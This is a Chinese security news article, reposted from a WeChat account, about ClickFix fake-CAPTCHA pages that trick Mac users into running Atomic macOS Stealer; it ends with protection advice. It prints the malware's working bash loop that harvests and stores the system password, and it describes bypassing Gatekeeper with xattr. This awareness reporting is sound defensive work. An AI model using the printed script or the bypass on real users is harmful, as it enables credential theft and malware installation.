警惕!新型Atomic恶意软件借验证码入侵Mac,苹果用户紧急避坑

admin 2025年6月9日08:58:53评论20 views字数 2869阅读9分33秒阅读模式

 钓鱼伪装运营商。

警惕!新型Atomic恶意软件借验证码入侵Mac,苹果用户紧急避坑

警惕!新型Atomic恶意软件借验证码入侵Mac,苹果用户紧急避坑

PS:有内网web自动化需求可以私信

01

导语

    曾几何时,Mac用户总爱炫耀“我这辈子没见过杀毒软件”,如今这句话却成了最危险的flag。网络安全研究人员最近发出紧急警报:一场针对苹果用户的大规模恶意软件攻击正在蔓延,攻击者利用名为 “ClickFix” 的社会工程策略,诱骗用户下载 Atomic macOS Stealer(AMOS) 信息窃取程序。

    令人担忧的是,仅过去一年Mac恶意软件数量已暴增300%,苹果引以为傲的安全防线正被黑客层层击破。

警惕!新型Atomic恶意软件借验证码入侵Mac,苹果用户紧急避坑

一.完美骗局:从“验证码错误”到系统沦陷

    这场攻击的起点,看起来再平常不过。当用户访问伪装成美国电信提供商Spectrum的网站(如“panel-spectrum[.]net”或“spectrum-ticket[.]net”)时,会看到一个要求完成hCaptcha验证的页面,提示需要“检查连接安全性”才能继续。

    但无论用户如何操作,页面都会弹出 “CAPTCHA verification failed” (验证码验证失败)的错误信息,随后建议用户点击一个 “Alternative Verification”(替代验证)按钮。

一旦点击,精心设计的陷阱立即启动:

  1. 恶意命令被悄无声息地复制到剪贴板:用户毫无察觉

  2. 显示量身定制的操作指南:根据用户操作系统显示不同指令

  3. 对Mac用户的致命诱导:引导用户打开终端(Terminal)并运行恶意shell脚本

二.致命脚本:密码窃取与系统沦陷

    当Mac用户按照指示在终端运行脚本后,真正的噩梦开始。脚本会反复要求用户输入系统密码,直到输入正确为止。以下是黑客使用的核心密码窃取代码:

#!/bin/bash
username=$(whoami)
while true; do
    echo -n “System Password: ”
    read password
    echo
    if dscl . -authonly “$username” “$password” >/dev/null 2>&1; then
        echo -n “$password” > /tmp/.pass
        break
    else
        echo “Incorrect password! Try again.”
    fi
done

    这段代码利用macOS原生的dscl命令验证密码真伪,用户输入的正确密码会被存储在/tmp/.pass文件中。

获得密码后,攻击进入第二阶段:

  1. 下载AMOS恶意软件

  2. 使用窃取的密码执行sudo -S xattr -c命令,移除文件的隔离属性,绕过苹果的Gatekeeper安全机制

  3. 执行恶意二进制文件,彻底控制受害者的Mac

三.谁在幕后?俄语黑客与草率线索

    安全研究人员在分析恶意软件源代码时发现了俄语注释,表明这很可能是俄语网络犯罪团伙所为。

    虽然攻击手法专业,但攻击者部署的钓鱼网站却暴露出一些破绽:

  • 平台指令混乱:向Linux用户代理显示PowerShell命令

  • 向Windows和Mac用户同时显示“按住Windows键+R”的提示

  • 前端逻辑存在多处不一致

    安全研究员Koushik Pal指出:“交付站点中逻辑实施不当,如跨平台指令不匹配,表明基础设施是仓促搭建的。”

四.为什么这次攻击如此危险?

    与以往单纯窃取个人信息的恶意软件不同,AMOS窃取活动具有更严重的潜在威胁

  1. 企业级危害:获取的macOS系统密码可能被用于访问企业VPN、内部系统和资源,为攻击者打开进入公司网络的大门

  2. 社交工程攻击:盗取账户后,黑客会利用受害者身份实施 “角色扮演”式诈骗,欺骗联系人列表中的亲友同事

  3. 安全机制失效:恶意软件使用macOS原生命令窃取凭证并绕过安全措施,传统安全软件难以检测

  4. 跨平台特性:同一钓鱼活动针对不同操作系统提供定制化攻击载荷,Windows用户会被诱导执行PowerShell命令

五.ClickFix:黑客的“万能钥匙”攻击手法

    Atomic Stealer攻击只是利用ClickFix技术的众多恶意活动之一。过去一年,采用这种手法的攻击活动激增,成为黑客突破安全防线的“利器”。

ClickFix攻击的经典流程:

警惕!新型Atomic恶意软件借验证码入侵Mac,苹果用户紧急避坑

    用户访问恶意链接显示虚假验证码提示验证失败诱导点击“替代验证”复制恶意命令到剪贴板显示执行指令用户执行命令系统被入侵

    安全公司Darktrace发现,ClickFix攻击已在欧洲、中东、非洲和美国的客户环境中广泛出现。这些活动不断演变,但最终目标始终是投放恶意载荷——从木马、信息窃取程序到勒索软件。

    就在最近,还有攻击者仿冒Booking.com,针对酒店连锁和餐饮服务行业发起钓鱼邮件攻击,同样使用虚假验证码传播恶意软件。

苹果用户自救指南

    面对日益狡猾的Mac恶意软件,仅靠苹果内置防护已不足够。以下防护措施至关重要:

  1. 警惕“验证失败”陷阱:遇到验证码错误后要求“替代验证”的网站,立即关闭页面

  2. 绝不盲从终端指令:任何要求你在终端输入密码的网页指令,一律视为高危操作

  3. 启用双重认证:为所有重要账户(尤其是Apple ID)开启双因素认证

  4. 定期检查系统更新:每周确认macOS是否更新至最新版本,及时修补漏洞

  5. 戒除破解软件依赖盗版软件和破解工具是恶意软件传播主要渠道

  6. 安装专业安全软件:选择信誉良好的Mac安全解决方案,提供实时防护

  7. 敏感操作三思而行:对“限时免费”、“老板急件”、“系统崩溃警告”等诱导性信息保持警惕

    安全专家强调:“这世上没有攻不破的系统,只有不设防的用户。”苹果的安全神话已被打破,用户需清醒认识到:在黑客眼中,裸奔的Mac已成为最诱人的攻击目标

免责声明:

本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。

第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助

第十二条:  国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。

第十三条:  国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。

原文始发于微信公众号(道玄网安驿站):警惕!新型Atomic恶意软件借“验证码”入侵Mac,苹果用户紧急避坑

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月9日08:58:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   警惕!新型Atomic恶意软件借验证码入侵Mac,苹果用户紧急避坑https://cn-sec.com/archives/4146112.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息